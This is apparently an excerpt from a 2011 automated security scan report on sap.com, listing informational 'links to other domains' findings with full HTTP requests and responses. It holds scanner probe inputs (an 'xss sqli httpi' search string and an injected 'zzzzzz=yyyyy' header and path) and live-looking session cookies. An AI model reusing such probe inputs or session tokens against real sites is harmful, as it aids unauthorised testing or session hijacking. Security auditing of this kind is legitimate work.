Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690909|check#true#1318689109

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:37 GMT
Content-Length: 9958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<br />
                           <a href="http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800?_s_icmp=CG4DA4BC51" class="btn-cta" onclick="TrackCTABtn(this);" target="_blank"><span>
...[SNIP]...
<div id="htb-highlight-right">
<a href="http://store.businessobjects.com/store/bobjamer/en_US/pd/Currency.USD/productID.228867500?_s_icmp=CG4DC32F0F" target="_blank" class="promoB first" style="background: url(/global/ui/images/promos/BuyNow_Promo1_BusinessAnalytics.jpg) no-repeat top left;">

                   <p class="offer">
...[SNIP]...
17.19. http://www.sap.com/customer-showcase/innovation/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/innovation/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /customer-showcase/innovation/index.epx?olt=CG4D999063 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:14 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:14 GMT
Content-Length: 39995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
</span><a href="http://store.businessobjects.com" id="mobjTemplate_mobjHeader_maLink1" target="_blank">Buying Options</a>
...[SNIP]...
<nobr><a id="mobjTemplate_mobjFooter_mRptTop_mHyperLink_5" rel="nofollow" href="http://www.careersatsap.com/" target="_blank">Careers</a>
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.20. http://www.sap.com/customer-testimonials/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-testimonials/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /customer-testimonials/index.epx?_=1318688501071 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.comzzzzzz=yyyyy
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:21:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:21:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:21:30 GMT
Content-Length: 32648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<li class="short"><a href="http://www.careersatsap.com/" onclick="TrackLink('http://www.sap.com/customer-testimonials/index.epx?_=1318688501071','Careers','ClickArea=footer')" >Careers</a>
...[SNIP]...
17.21. http://www.sap.com/gwtservices/httpBridge.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /gwtservices/httpBridge.epx?kNtBzmUK9zU=1&action=registrationLayer&refresh=false&redirect=https%3A%2F%2Fwww.sap.com%2Fprofile%2Flogin.epx%3Fpmelayer%3Dtrue%26kNtBzmUK9zU%3D1&dialog=http://www.sap.com/common/formAbandonWarning.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:34 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:26:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:34 GMT
Content-Length: 7669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.22. http://www.sap.com/lines-of-business/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /lines-of-business/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lines-of-business/index.epx?_=1318688587604 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:22:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:22:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:22:56 GMT
Content-Length: 24664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<li><a href="http://www.sapcfo.com" onclick="TrackCTABtn(this);" target="_blank">
Giving CFO...s the visibility to lead: CFO and Finance Leadership Center<span>
...[SNIP]...
<li class="short"><a href="http://www.careersatsap.com/" onclick="TrackLink('http://www.sap.com/lines-of-business/index.epx?_=1318688587604','Careers','ClickArea=footer')" >Careers</a>
...[SNIP]...
17.23. http://www.sap.com/news-reader/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news-reader/index.epx?category=ALL&articleID=17578&page=1&pageSize=10&_=1318690583286 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.com/news-reader/?articleID=17603
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:34 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:34 GMT
Content-Length: 33126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<p>For more information about on-demand solutions from SAP, visit the <A HREF="http://technology.news-sap.com" target=_blank>Technology and Platform newsroom</A>. Follow SAP on Twitter at <A HREF="http://twitter.com/SAPOnDemand" target=_blank>@SAPOnDemand</A> and <A HREF="http://www.twitter.com/sapnews" target=_blank>@sapnews</A>
...[SNIP]...
<li class="short"><a href="http://www.careersatsap.com/" onclick="TrackLink('http://www.sap.com/news-reader/index.epx?category=ALL&amp;articleID=17578&amp;page=1&amp;pageSize=10&amp;_=1318690583286','Careers','ClickArea=footer')" >Careers</a>
...[SNIP]...
17.24. http://www.sap.com/news-reader/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news-reader/index.epx?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:55 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:55 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:55 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Content-Length: 50791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
</a>. On this platform, you can find high resolution material for your media channels. To view video stories on diverse topics, visit <a href="http://www.sap-tv.com" target="_blank">www.sap-tv.com</a>
...[SNIP]...
<p>Follow SAP Investor Relations on Twitter at <a href="http://www.twitter.com/sapinvestor">@sapinvestor</a>
...[SNIP]...
<li class="short"><a href="http://www.careersatsap.com/" onclick="TrackLink('http://www.sap.com/news-reader/index.epx?articleID=17603&amp;_=1318690575808','Careers','ClickArea=footer')" >Careers</a>
...[SNIP]...
17.25. http://www.sap.com/sme/search/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/search/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/partners/findpartner/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:28:18 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:28:18 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:28:18 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:28:18 GMT
Content-Length: 47227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
</span><a href="http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.46894500" id="mobjTemplate_mobjHeader_maLink4" target="_blank">Store</a>
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.26. http://www.sap.com/zzzzzz=yyyyy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /zzzzzz=yyyyy

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /zzzzzz=yyyyy?_=1318688469563 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.sap.com/country-selector.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688530|session#1318688461599-607633#1318690330

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 32995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
</span><a href="http://store.businessobjects.com" id="mobjTemplate_mobjHeader_maLink1" target="_blank">Buying Options</a>
...[SNIP]...
<nobr><a id="mobjTemplate_mobjFooter_mRptTop_mHyperLink_5" rel="nofollow" href="http://www.careersatsap.com/" target="_blank">Careers</a>
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.27. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 